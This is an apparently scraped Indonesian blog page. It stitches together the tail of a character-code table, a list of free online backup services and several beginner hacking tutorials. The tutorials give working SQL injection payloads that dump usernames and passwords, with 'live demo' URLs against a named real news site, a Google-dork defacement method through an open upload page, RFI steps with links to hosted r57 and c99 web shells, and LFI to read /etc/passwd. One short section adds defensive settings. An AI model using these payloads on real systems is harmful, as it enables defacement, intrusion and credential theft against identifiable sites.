] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis
Senin, Februari 02, 2009
Alamat "BackUp data Online
~ oLeh : vYc0d~
1. BlogBackupOnline
http://www.blogbackuponline.com/techrigy/
Buat anda yang memiliki blog dan tidak menginginkan terjadinya kehilangan blog tersebut, anda dapat memanfaatkan layanan ini untuk membantu anda mem-back up data penting di blog anda secara otomatis dan tentunya gratis dengan storage 50Mb.
2. ElephantDrive
http://www.elephantdrive.com/index.aspx
ElephantDrive ini menawarkan storage penyimpanan gratis sebesar 1GB dan hingga 1TB dengan mengisi formulir pengajuan.
3. File123
http://www.file123.com/default.aspx
File123 menawarkan space penyimpanan gratis sebesar 1GB
4. Mp3Tunes
http://www.mp3tunes.com
Mp3Tunes ini menyediakan tempat penyimpanan koleksi musik anda tidak terbatas dan gratis, anda juga dapat streaming/mendengarkan secara online lagu-lagu yang anda simpan disini darimanapun anda berada.
5. OmniDrive
http://www.omnidrive.com
Dengan OmniDrive ini, anda dapat mem-back up file apa saja yang anda miliki hingga 1GB. Disamping itu, back up anda bisa anda akses darimana saja atau anda gunakan sebagai hosting file untuk situs.
6. Steekr
http://www.steekr.com
Steekr ini menyediakan ruang penyimpanan online sebesar 1GB untuk media digital anda secara gratis. Selain itu anda dapat akses untuk mendengarkan musik yang anda simpan dimana saja dan juga berbagi/sharing file anda dengan orang lain.
7. Textive
http://www.textive.com
Layanan yang disediakan textive ini adalah back up dokumen anda secara online dan gratis dengan tanpa batasan bandwith dan ruang.
8. YunTaa
http://www.yuntaa.com/
Anda dapat mensinkronisasikan hard disk anda dengan storage online yang disediakan YunTaa ini. Layanan ini juga bisa anda manfaatkan untuk sharing file anda. Versi gratis yang disediakan YunTaa adalah storage dengan ruang 1GB.
Publisher>Elayne Amelia
Tutorial Hacking yang bisa anda pelajari
~ oLeh : Don Tukulesto~
[ Kumpulan Tutorial Hacking Web ]
Level : Pemula
Hampir semua para pemula yang pingin hacking web atau deface web, menggunakan jasa layanan
seacrh engine site google alias mengandalkan dork, xixixixixixi. Pokoknya ada suka dan duka
disaat pencarian target, xixixixixixi. Sukanya dapat tuh target dan dukanya gak dapat sama
sekali, wuakakakakakaka, dan tak lupa juga para pemula yang mau belajar hacking, gak lepas
dari sisi site milw0rm. Disini aku akan melampirkan beberapa teknik hacking web yang masih
berlaku dan bisa digunakan.
Hacking pada Ourspace 2.0.9
---------------------------
Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343. Ok kita dah ambil toh. Sekarang kita akan mencoba
1. Buka google, trus ketik inurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di hack
contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul kalimat upload files
5. Isi deh atau upload file html anda.
Hacking Remote File Inclusion
-----------------------------
Disini saya akan menguraikan dengan singkat dari teknik hacking RFI.
1. Buka google trus ketik "Php Blue Dragon" pada search enginenya
2. Setelah itu cari situs yang mau di hack
Contohnya : http://www.komix91.ovh.org (site dikiri, da lama aku hack tapi lupa bugnya yang mana, hehehehehehe)
Ngomong-ngomong karena aku da lupa bug mana tuh, lebih baik kalian cari aja di http://www.milw0rm.com
Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
Oke, selanjutnya kalian coba aja sendiri ya. Ngomong-ngomong kalau ada kata evil code pada bug situ itu
maksudnya web shell. Kalau gak ada web shell pake punya aku aja. Itung-itung amal, hehehehehehehe
- http://www.geocities.com/engel_hacking/r57.txt?
- http://www.geocities.com/engel_hacking/c99.txt?
- http://www.geocities.com/engel_hacking/Ekin0x.txt?
Well, jangan terpengaruh di link web shell aku yang ada kata engel_hacking, aku bukan malaikat hacking, tapi
ngaku-ngaku malaikat hacking, wuakakakakakakakaka. Padahal gak hebat amat. Cuma Internet Holic doank. Hehehe
3. Selamat mencoba ya. Semoga sukses.
Hacking SQL Injection
---------------------
Disini saya akan menguraikan singkat teknik hacking SQL injection. Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh disini saya mengambil BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk me-
ncari bug sql pada web.
2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita injeck. Contoh :
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.
4. Selamat Mencoba. Semoga sukses
Pesan sebelum mencoba : Disini saya hanya menguraikan beberapa teknik hacking yang sering digunakan oleh pemula, seperti yang telah saya jelaskan diatas.
banyak pemula pingin hacking web atau deface, menggunakan layanan site google dan site milw0rm.
Kayaknya da cukup penjelasan singkat saya mengenai hacking. Informasi lebih lanjut anda bisa memncari di beberapa sumber yang lebih
detail membahas tentang hacking. Lagian disini saya hanya menjelaskan dengan singkat and just internet holic.
" Jangan pernah malu untuk menjadi seorang pemula "
Thanks To : Moon_Lee | Kamuiclone | Mr.C | Basix | cr4wl3r | bl4ck_3n91n3 | NightProphet | nTc | Chawanua | CyberLog | Cokiki | Funky_Sensey |
b1beh^pink | Tasya | Mr.Crossbeam | M3G4TR0N | PanTeTo | Doniskynet | d3w0 | GheMax | Exnome | S4NT4 | Atan6 | Don | D'Mack |
Mitchondiria | Shinci |
All Newbie Indonesian IT
Minggu, Januari 11, 2009
Blind SQL Injection
~~Oleh : Selalu_ngantuk~~
sepintas tekhnik ini sama dengan tekhnik SQL pada umumnya...
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
###################
## +step Satu+ ##
###################
carilah target
misal: [site]/berita.php?id=
disini saya memilih :
http://www.lampungpost.com/aktual/berita.php?id=12
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
contoh :
http://www.lampungpost.com/aktual/berita.php?id=-12
sehingga muncul pesan error .
###################
## +step dua+ ##
###################
mencari dan menghitung jumlah table yang ada dalam databasenya...
seperti yang kita ketahui bersama pada SQL injection untuk menghitung jumlah table pada databasenya
menggunakan perintah : order by
contoh :
[site]/berita.php?id=-12 order by 1--
[site]/berita.php?id=-12 order by 2--
livedemo :
http://www.lampungpost.com/aktual/berita.php?id=-12 order by 1--
http://www.lampungpost.com/aktual/berita.php?id=-12 order by 2--
hingga muncul pesan error...
namun untuk kasus tertentu order by tidak dapat digunakan ...
pada blind SQL kita dapat mengetahui jumlah table yang ada dengan cara Melakukan column count !!!
contoh melakuan column count :
union select diikuti dengan angka.
maka: [site]/berita.php?id= union select 1/*
maka: [site]/berita.php?id= union select 1,2/*
maka: [site]/berita.php?id= union select 1,2,3/*
hingga keluar angka pada tampilan web target
livedemo:
maka: http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,2,3,4,5,6,7,8,9/*
ternyata yang keluar sampai angka 9
ok angka yg keluar angka 9 dan 2
###################
## +step tiga+ ##
###################
menampilkan table...
pada SQL injection untuk menampilkan table adalah memasukkan perintah group_concat(table_name) pada angka yg keluar tadi
dan perintah +from+information_schema.tables+where+table_schema=database() setelah angka terakhir
contoh :
[site]/berita.php?id=-12+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
livedemo :
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,2,3,4,5,6,7,8,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()----
jika gagal kita dapat mengganti querynya
query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1
masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"
menjadi , [site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 0,1/*
disini saya menggunakan 2.
livedemo:
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 0,1/*
####################
## +step empat+ ##
####################
mengeluarkan table_name yang lain.
untuk mengeluarkan table_name yang lain ganti nilai limit menjadi , 1,1 , 2,1 , 3,1 ....
hingga mendapatkan table yang kita inginkan !!!
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 1,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 2,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 3,1/*
live demo:
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 1,1/*
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 2,1/*
dan hasilnya :
1,1 : aktual_berita
2,1 : aktual_kategori
3,1 : berita
4,1 : category
5,1 : iklan
10,1: user
dan tabel yang kita butuhkan ada pada limit 10,1 ( user )
###################
## +step lima+ ##
###################
ada tahap ini kamu wajib mengekstrax kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://ascii-convert.tk/
kata user menjadi : 75736572
maka :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=user limit 0,1/*
menjadi
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
livedemo :
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
untuk mengetahui isi pada table user anda dapat mengganti nilai limit :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 1,1/*
live demo:
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 1,1/*
dan hasilnya :
0,1 : userid
1,1 : password
1,2 : description
1,3 : auth
* Setiap bilangan hexa harus di tambah 0x
contoh : bilangan hexa dari indonesiacoder = 696E646F6E65736961636F646572
bila di gunakan akan menjadi = 0×696E646F6E65736961636F646572
###################
## +step enam+ ##
###################
mengeluarkan field .
query yang kita gunakan adalah : UNION SELECT column_name FROM table_name
column_name :userid, password
table_name :user
masukan column_name pada angka yang keluar kemudian FROM table_name
menjadi,
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from table_name/*
contoh
[site]/berita.php?id=-12 union select 1,password,3,4,5,6,7,8,9 from user/*
live demo:
karena angka yang keluar 2 dan 9 maka ,
http://www.lampungpost.com/aktual/berita.php?id=-1 union select 1,password,3,4,5,6,7,8,userid from user/*
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,concat(userid,0x3a,password,0x3a,description),3,4,5,6,7,8,9 from user/*
* Mengunakan Concatenation
Concatenation adalah kondisi dimana kamu ingin mengeluarkan field dengan banyak colomn_name atau karna kurangnya angka yang keluar saat blind union. untuk string Concatenation pada mysql adalah CONCAT(A,B,C,...)
contoh:
kondisi kurangnya angka yang keluar saat blind union.
column_name : userid, password, description
table_name :user
angka yang keluar: 2 dan 9
bagaimana kita mengeluarkan field dengan 3 column_name sedangkan angka yang keluar hanya 2 (2 dan 9), jawabanya menggunakan concat() tadi.
http://www.lampungpost.com/aktual/berita.php?id=-12 union select 1,concat(0x3a,userid,password,description),3,4,5,6,7,8,9 from user/*
###################
## +step enam+ ##
###################
tahap terakhir mencari halaman admin atau login
thanks to : Paman , X-shadow , gonzhack , dontukulesto , M364TR0N , Cyb3R_tr0n , bayu5154 , tucker , petrucii , M3NW5 , Mr.Joker , #00000 , miSs cHerCut
Spesial thanks to : INDONESIACODER CREW , DEFACER.BIZ CREW , PAGUNCODING CREW
Bug RFI & LFI, serta pencegahannya
Author : cr4wl3r
Email : cr4wl3r[at]linuxmail[dot]org
Website : www.defacer.biz
-> [Gambaran singkat ]<
Sebelumnya apa sih LFI dan RFI itu??
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.
-> [Penjelasan ]<
fungsi-fungsi yang dapat menyebabkan LFI/RFI:
include();
include_once();
require();
require_once();
Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,
Code:
include "../$_GET[framefile]";
?>
misal $framefile=main.php
mungkin di url akan terlihat seperti ini bentuknya
http://www.[target].com/index.php?framefile=main.php
maka script ini akan menampilkan halaman main.php.
nah disini attacker akan dapat melakukan LFI karena variable framefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser.
kita bisa menggunakan metode menebak struktur folder dalam website target ^^
tapi seandainya terdapat error seperti di bawah ini:
Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini
Code:
include($_GET[framefile].".php";
?>
nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti
http://www.[target].com/index.php?framefile=../../../../../../../../../etc/passwd
lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.
Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable framefile. misalnya:
http://www.[target].com/index.php?framefile=http://www.[remote].com/script.txt
dengan file script.txt misal berisi "hacked by cHer"
jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.
-> [Pencegahan ]<
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,
include("./"$_GET[framefile].".php";
maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.
http://www.[target].com/index.php?framefile=http://www.[remote].com/script.txt
dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/script.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.
- [Sekian ]<
Mudah-mudahan artikel ini bisa menambah pengetahuan kita.
------------------------------------------------------------------------------
Sql Injection Ver. 5
Untuk mencari ada atau tidak bugnya sebenernya ada di artikel sebelumnya, juga standar pencarian union, gue cuma nambahin sedikit aja, jadi gue copy paste aje ye
1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url?
contoh http://www.target.com/news.php?id=5′
maka akan muncul error
?You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc??
Atau Yang mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1/* http://www.target.com/news.php?id=5+order+by+2/* http://www.target.com/news.php?id=5+order+by+3/* http://www.target.com/news.php?id=5+order+by+4/* Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+...SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+...select+1,2,3/*
NOTE: jika /* tidak bisa atau terjadi error, coba dengan ?
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+...,@@version,3/*
Jika kamu mendapatkan error ?union + illegal mix of collations (IMPLICIT + COERCIBLE) ??
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+...ng+latin1),3/*
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+...@version)),3/*
dan kamu akan mendapatan versi MySql
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community?)
? Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+...()+limit+0,1/*
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
? Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+...n?+limit+0,1/*
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0?61646D696E
http://www.target.com/news.php?id=5+...6E+limit+0,1/*
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+...3+from+admin/*
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+...3+from+admin/*
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+...3+from+admin/*
catatan : 0?3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(5, merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+...3+from+admin/*
Maka akan muncul tampilan data : admin45w0rd